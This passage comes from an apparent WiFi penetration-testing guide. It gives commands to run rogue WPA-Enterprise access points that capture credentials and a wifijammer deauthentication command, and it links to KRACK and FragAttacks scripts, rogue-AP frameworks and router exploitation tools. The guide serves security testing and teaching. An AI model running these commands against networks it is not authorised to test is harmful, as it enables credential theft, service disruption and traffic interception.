379 | | Ubuntu 16.04.5 | VirtualBox (OVA) | ricardojoserf:wifi | 3.18 GB | [MEGA](https://mega.nz/file/N5slGZLC#Dx1rBEMoNOAqdaEpB7BHhRi26HDxkJlyoQNk0frWDkw) |
380 | | Kali 2019.1 | VirtualBox (OVA) | root:wifi | 5.56 GB | [MEGA](https://mega.nz/file/pl0j3ZwC#zE_skdeUCLoOSQHvtHrvejmA4Ktn9Qk0Sk0qI1d4KeI) |
381 |
382 | ### Local installation
383 |
384 | In case you do not want to use the virtual machine, you can install everything using:
385 |
386 | ```
387 | git clone https://github.com/ricardojoserf/WPA_Enterprise_Attack
388 |
389 | cd WPA_Enterprise_Attack && sudo sh install.sh
390 | ```
391 |
392 | ### Hostapd & Freeradius-wpe
393 |
394 | Start the Access Point using:
395 |
396 | ```
397 | sh freeradius_wpe_init.sh $AP_NAME $INTERFACE
398 | ```
399 |
400 | When a client connects, read logs with:
401 |
402 | ```
403 | sh freeradius_wpe_read.sh
404 | ```
405 |
406 | ### Hostapd-wpe
407 |
408 | ```
409 | sh hostapd_wpe_init.sh $AP_NAME $INTERFACE
410 | ```
411 |
412 |
413 |
414 | ## 5.2 Brute force
415 |
416 | - [Airhammer](https://github.com/Wh1t3Rh1n0/air-hammer)
417 |
418 | ## 5.3 EAP methods supported
419 |
420 | Find supported EAP methods
421 |
422 | - [EAP_buster](https://github.com/blackarrowsec/EAP_buster)
423 |
424 | -------------------------
425 |
426 |
427 |
428 | # 6. Other attacks
429 |
430 |
431 | ## 6.1. Krack Attack and Frag Attack
432 |
433 | These are two advanced attacks discovered by the great [Mathy Vanhoef](https://twitter.com/vanhoefm):
434 |
435 | - [Krack Attack Scripts](https://github.com/vanhoefm/krackattacks-scripts) - Explained in [this website](https://www.krackattacks.com/)
436 |
437 | - [Frag Attack Scripts](https://github.com/vanhoefm/fragattacks) - Explained in [this website](https://www.fragattacks.com/)
438 |
439 |
440 | ## 6.2. OSINT
441 |
442 | - [Wigle](https://wigle.net/)
443 |
444 |
445 |
446 | ## 6.3. Wifi Jamming
447 |
448 | - [Wifijammer](https://github.com/DanMcInerney/wifijammer) - This program can send deauthentication packets to both APs and clients.
449 |
450 | An example to deauthenticate all the devices except a Fake Acess Point:
451 |
452 | ```
453 | sudo ./wifijammer -i $IFACE -s $FAKE_AP_MAC
454 | ```
455 |
456 | ## 6.4. Other frameworks
457 |
458 | Linux:
459 | - [Sniffair](https://github.com/Tylous/SniffAir)
460 | - [Wifi Pumpkin](https://github.com/P0cL4bs/wifipumpkin3) - Framework for Rogue WiFi Access Point Attack
461 | - [Eaphammer](https://github.com/s0lst1c3/eaphammer) - Framework for Fake Access Points
462 | - [WEF](https://github.com/D3Ext/WEF) - Framework for different types of attacks for WPA/WPA2 and WEP, automated hash cracking and more
463 |
464 | Windows:
465 | - [Acrylic](https://www.acrylicwifi.com) - Useful for recon phase
466 | - [Ekahau](https://www.ekahau.com/) - Useful for Wi-Fi planning
467 | - [Vistumbler](https://www.vistumbler.net/) - Useful for wardriving
468 |
469 |
470 |
471 |
472 | -------------------------
473 |
474 |
475 |
476 | # 7. Post-exploitation
477 |
478 | Once you are connected to the network
479 |
480 | ## 7.1. Attacking the router
481 |
482 | - [Routersploit](https://github.com/threat9/routersploit) - Exploitation Framework for Embedded Devices - Test "use scanners/autopwn"
483 |
484 | ## 7.2. Types of scanners
485 |
486 | - Nmap/Zenmap - Security Scanner, Port Scanner, & Network Exploration Tool
487 |
488 | - Masscan - The faster version of nmap (it can break things, so be careful)
489 |
490 | - Netdiscover - ARP sniffing. Very useful if the networks are very well segmented
491 |
492 | ## 7.3. Spoofing
493 |
494 | - Ettercap - Check if you can do a MitM attack and sniff all the traffic in the network
495 |
496 |
--------------------------------------------------------------------------------